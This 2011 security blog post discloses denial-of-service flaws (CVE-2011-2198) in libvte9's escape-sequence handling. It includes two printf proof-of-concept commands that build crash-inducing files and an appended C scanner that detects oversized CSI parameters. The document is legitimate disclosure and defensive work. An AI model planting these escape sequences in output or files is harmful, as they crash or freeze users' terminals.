libvte9: Escape sequences of death (CVE-2011-2198)

Thu, 16 Jun 2011 20:14:29 +0200
Tags: security

While playing with terminals, I discovered several missing checks in the way that libvte9.so handles escape sequences. This library is used by many terminal emulators, such as gnome-terminal, lxterminal and xfce4-terminal. Successful exploitation of these vulnerabilities can crash the terminal emulator or cause excessive memory and CPU consumption.

DoS using the "insert-blank-characters" capability (reported as BUG#629688):

$ printf "\033[100000000000000000@" > /tmp/ic-file_of_death
$ cat /tmp/ic-file_of_death

DoS using the "window-manipulation" capability (not reported yet):

$ printf "\033[10000t\n\033[100000t" > /tmp/wm-file_of_death
$ cat /tmp/wm-file_of_death

This has been tested on Debian 6.0.1, kernel 2.6.32-5-amd64, libvte9 version 1:0.24.3-2 and gnome-terminal version 2.30.2-1.
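
The kind of check that is missing, as an added example (not code from this post or from vte): a CSI parameter parser that saturates at a bound, plus a scanner that counts sequences in a buffer whose parameters exceed it, so untrusted files can be checked before being written to a terminal. The bound CSI_PARAM_MAX and the function names csi_param, count_oversized_csi and scan_cstr are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

#define CSI_PARAM_MAX 9999L /* assumed bound, not a value taken from vte */

/* Parse one decimal parameter, saturating at CSI_PARAM_MAX so a long digit
 * run can neither overflow nor become a huge repeat count or size. */
static long csi_param(const unsigned char *p, size_t len, size_t *used, int *clamped)
{
    long v = 0;
    size_t i = 0;
    for (; i < len && p[i] >= '0' && p[i] <= '9'; i++)
        if (v <= CSI_PARAM_MAX) /* stop accumulating once past the bound */
            v = v * 10 + (p[i] - '0');
    *used = i;
    *clamped = v > CSI_PARAM_MAX;
    return *clamped ? CSI_PARAM_MAX : v;
}

/* Count CSI sequences (ESC '[' ...) carrying at least one oversized parameter. */
size_t count_oversized_csi(const unsigned char *buf, size_t len)
{
    size_t hits = 0;
    for (size_t i = 0; i + 1 < len; i++) {
        if (buf[i] != 0x1b || buf[i + 1] != '[')
            continue;
        size_t j = i + 2, used;
        int over = 0, clamped;
        while (j < len && buf[j] >= 0x30 && buf[j] <= 0x3f) { /* parameter bytes */
            if (buf[j] <= '9') {
                (void)csi_param(buf + j, len - j, &used, &clamped);
                over |= clamped;
                j += used;
            } else {
                j++; /* ';' separator or private marker */
            }
        }
        hits += (size_t)over;
        i = j - 1; /* resume at the byte that ended the parameter run */
    }
    return hits;
}

size_t scan_cstr(const char *s) /* helper for NUL-terminated samples */
{
    return count_oversized_csi((const unsigned char *)s, strlen(s));
}

int main(void)
{
    printf("ic: %zu\n", scan_cstr("\033[100000000000000000@"));
    printf("wm: %zu\n", scan_cstr("\033[10000t\n\033[100000t"));
    printf("benign: %zu\n", scan_cstr("\033[1;31mred\033[0m")); /* constructed */
    return 0;
}
```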